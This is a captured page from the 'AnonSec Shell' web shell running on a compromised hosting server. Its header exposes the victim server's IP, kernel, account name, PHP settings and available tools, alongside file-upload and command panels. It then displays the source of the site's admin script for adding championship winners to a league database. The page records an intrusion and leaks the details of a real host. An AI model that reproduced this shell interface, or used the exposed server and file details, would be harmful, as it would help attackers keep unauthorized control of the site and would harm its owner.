AnonSec Shell
Server IP : 149.202.105.228  /  Your IP : 216.73.216.18
Web Server : Apache
System : Linux webm129.cluster030.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User : atfycaf ( 116275)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/atfycaf/www/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/atfycaf/www/admin//honoursNew.php
<?php
$thisCheckID	= 16;
include "globalVars.php";

include "header.php";
?>

				<h2>Create a New Championship Winner</h2>
<?php

if (isset($_POST["createWinner"])) {

	$groupType		= cleanPost($_POST["groupType"], $conn);
	$honourYear		= cleanPost($_POST["honourYear"], $conn);
	$honourLocation	= cleanPost($_POST["honourLocation"], $conn);
	$honourWinner	= cleanPost($_POST["honourWinner"], $conn);

	mysqli_query($conn, "INSERT INTO honours (groupType, honourYear, honourLocation, honourWinner) VALUES ('$groupType', '$honourYear', '". addslashes($honourLocation) ."', '". addslashes($honourWinner) ."')") or die (mysqli_error($conn));

	$groupQuery = mysqli_query($conn, "SELECT groupTitle FROM honoursGroups WHERE id = '$groupType'");
	while ($gQ = mysqli_fetch_array($groupQuery)) {
		$groupTitle		= $gQ["groupTitle"];
	}

	$trackDate		= date("Y-m-d H:i:s");
	mysqli_query($conn, "INSERT INTO userActions (dateCreated, adminID, pageTracking, databaseUpdated, updateDetails) VALUES ('$trackDate', '$adminID', 'admin/honoursNew.html', 'leagueConfig', 'The User ". addslashes($adminName) ." &lt;$adminEmail&gt; created the new ". addslashes($groupTitle) ." Winner ". addslashes($honourWinner) ." for $honourYear')");


	echo "<p><strong>Success!</strong> The new Championship Winner $honourWinner for $honourYear has been created.</p>";

} else {
	?>
    <form action="honoursNew.html" method="post" style="float:left; clear:both;">
		<div class="descStTab">
			<div class="pFormRow">
				<div class="pFormTitle">Tournament Group:</div>
				<div class="pFormSelect">
					<select name="groupType" required>
						<option value="" selected disabled>Select</option>
					<?php
					$groupQuery = mysqli_query($conn, "SELECT * FROM honoursGroups ORDER BY id ASC");
					while ($gQ = mysqli_fetch_array($groupQuery)) {
						$groupID	= $gQ["id"];
						$groupName	= $gQ["groupTitle"];
						?>
						<option value="<?php echo $groupID ?>"><?php echo $groupName ?></option>
						<?php
					}
					?>
					</select>
					<div class="pFormLabel">
						<label class="labelName">Tournament Group:</label>
					</div>
				</div>
			</div>
			<div class="pFormRow">
				<div class="pFormTitle">Tournament Year:</div>
				<div class="pFormSelect">
					<select name="honourYear" required>
						<option value="" selected disabled>Select</option>
					<?php
					for ($year = date("Y"); $year >= 2000; $year -= 1) {
						?>
						<option value="<?php echo $year ?>"><?php echo $year ?></option>
						<?php
					}
					?>
					</select>
					<div class="pFormLabel">
						<label class="labelName">Tournament Year:</label>
					</div>
				</div>
			</div>
			<div class="pFormRow">
				<div class="pFormTitle">Tournament Location:</div>
				<div class="pFormInput">
					<input type="text" name="honourLocation" size="50" />
					<div class="pFormLabel">
						<label class="labelName">Tournament Location:</label>
					</div>
				</div>
			</div>
			<div class="pFormRow">
				<div class="pFormTitle">Winner Name:</div>
				<div class="pFormInput">
					<input type="text" name="honourWinner" size="50" />
					<div class="pFormLabel">
						<label class="labelName">Winner Name:</label>
					</div>
				</div>
			</div>
		</div>
		<input type="submit" class="submitButton" name="createWinner" value="Create New Winner" />
	</form>
	<?php
}
?>

<?php
include "footer.php";
?>

Anon7 - 2022
AnonSec Team